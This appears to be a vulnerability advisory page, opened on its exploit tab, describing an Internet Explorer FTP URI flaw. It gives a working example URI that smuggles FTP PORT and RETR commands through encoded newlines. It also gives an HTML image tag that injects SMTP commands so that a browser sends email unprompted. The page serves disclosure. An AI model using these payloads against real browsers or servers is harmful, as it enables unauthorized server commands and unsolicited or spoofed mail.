• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Microsoft Internet Explorer FTP URI Arbitrary FTP Server Command Execution Vulnerability

An example URI sufficient to exploit this vulnerability is provided:

ftp://ftp.example.com/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file

The 'a,b,c,d,e,f' would represent the IP address and port specifications, as per the FTP RFCs.

This issue has also been reported to allow for the sending of email without user interaction. Embedding the following image into an HTML page reportedly sends an email:

<img src="ftp://foo%0d%0aHELO%20mail%0d%0aMAIL%20FROM%3a&lt;&gt;%0d%0aRCPT%20TO%3a&lt;username%40example.com&gt;%0d%0aDATA%0d%0aSubject%3a%20hacked%0d%0aTo%3a%20username%40example.com%0d%0a%0d%0ahacked%0d%0a.%0d%0a:username@mx.example.net:25/" />